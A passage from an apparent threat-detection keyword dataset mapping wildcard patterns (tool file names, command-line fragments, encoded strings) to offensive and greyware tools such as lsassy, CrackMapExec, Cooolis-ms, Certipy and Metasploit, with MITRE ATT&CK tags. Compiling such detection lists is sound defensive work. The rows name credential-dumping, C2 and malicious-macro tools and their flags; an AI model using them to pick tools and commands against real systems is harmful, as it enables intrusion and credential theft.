T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*lsassy_dump*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*lsassy_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*lsassy_dump.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*lsassy-linux-x64-*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*lsassy-MacOS-x64-*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*lsassy-windows-x64-*.exe,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*lse.sh -l*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*luckystrike.ps1*,offensive_tool_keyword,luckystrike,A PowerShell based utility for the creation of malicious Office macro documents.,T1566 - T1059 - T1027,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/curi0usJack/luckystrike,1,1,N/A,N/A,10,1084,250,2017-11-03T17:52:13Z,2016-09-22T18:57:50Z -*LUgsLS1IT1NU*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*luijait/PwnKit*,offensive_tool_keyword,POC,exploitation of CVE-2021-4034,T1210,N/A,N/A,N/A,Exploitation tools,https://github.com/luijait/PwnKit-Exploit,1,1,N/A,N/A,1,79,14,2022-02-07T15:42:00Z,2022-01-26T18:01:26Z -*luks2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*lures create *,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,0,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*LVAsLS1QT1JU*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*LW8sLS1vcHRpb25z*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*LWIsLS1idWNrZXQ=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*LWYsLS1maWxl*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*LXAsLS1waWQ=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*LXAsLS1wYXlsb2Fk*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*LXUsLS11cmk=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*ly4k/Certipy*,offensive_tool_keyword,ADCSKiller,ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure,T1552.004 - T1003.003 - T1114.002,TA0006 - TA0003 - TA0005,N/A,N/A,Exploitation tools,https://github.com/grimlockx/ADCSKiller,1,1,N/A,N/A,6,535,53,2023-05-19T17:36:37Z,2023-05-19T06:51:41Z -*ly4k/Certipy*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,1,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*ly4k/PassTheChallenge*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,1,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*lyncsmash*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations,T1580 - T1201 - T1071 - T1110 - T1078,TA0043 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*lyncsmash.git*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*lyncsmash.log*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*lyncsmash.py*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*lyncsmash-master*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*LyncSniper*,offensive_tool_keyword,LyncSniper,LyncSniper is a tool for penetration testing Lync and Skype for Business deployments hosted either on premise or in Office 365,T1566 - T1574 - T1210 - T1596,TA0002 - TA0011 - TA0009,N/A,N/A,Exploitation tools,https://github.com/mdsecactivebreach/LyncSniper,1,0,N/A,N/A,1,9,3,2017-04-11T08:38:28Z,2017-06-12T10:56:58Z -*-m * -d * -w * --top-web-ports*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,0,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*-m dumpert *,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,0,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*-M handlekatz -o *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*M.i.m.i.k.a.t.z*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*m00zh33/golang_c2*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,1,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*m0rv4i/SharpCookieMonster*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*m3f157O/combine_harvester*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,1,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*m4ll0k/SecretFinder*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,1,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*MAAD_Attack.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*MAAD_Config.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*MAAD_Mitre_Map.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*MAADInitialization.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*mac.changer on*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*mac_dirty_cow.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mac2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*mac2john-alt.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*MaccaroniC2.git*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*macchanger -r *,greyware_tool_keyword,macchanger,changing mac address with macchanger,T1497.001 - T1036.004 - T1059.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,5,10,N/A,N/A,N/A,N/A -*macchanger -r*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,0,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z -*macdlemfnignjhclfcfichcdhiomgjjb*,greyware_tool_keyword,Free Fast VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*MaceTrap.exe*,offensive_tool_keyword,macetrap,MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders,T1070.004,TA0040,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*machine1337/TelegramRAT*,offensive_tool_keyword,TelegramRAT,Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions,T1071.001 - T1105 - T1027,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/machine1337/TelegramRAT,1,1,N/A,10,10,198,35,2023-08-25T13:41:49Z,2023-06-30T10:59:55Z -*MacOS/ipscan -*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*macro_pack*,offensive_tool_keyword,macro_pack,The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.,T1566.001 - T1564.001 - T1564.003,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/sevagas/macro_pack,1,0,N/A,N/A,10,1950,404,2022-05-12T13:30:29Z,2017-10-03T18:30:06Z -*MacroDetectSandbox.vbs*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*MacroExploit.txt*,offensive_tool_keyword,Excel-Exploit,MacroExploit use in excel sheet,T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main,1,1,N/A,N/A,1,21,4,2023-06-12T11:47:52Z,2023-06-12T11:46:53Z -*Macrome *--decoy-document*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*Macrome *--payload*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*Macrome build*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation 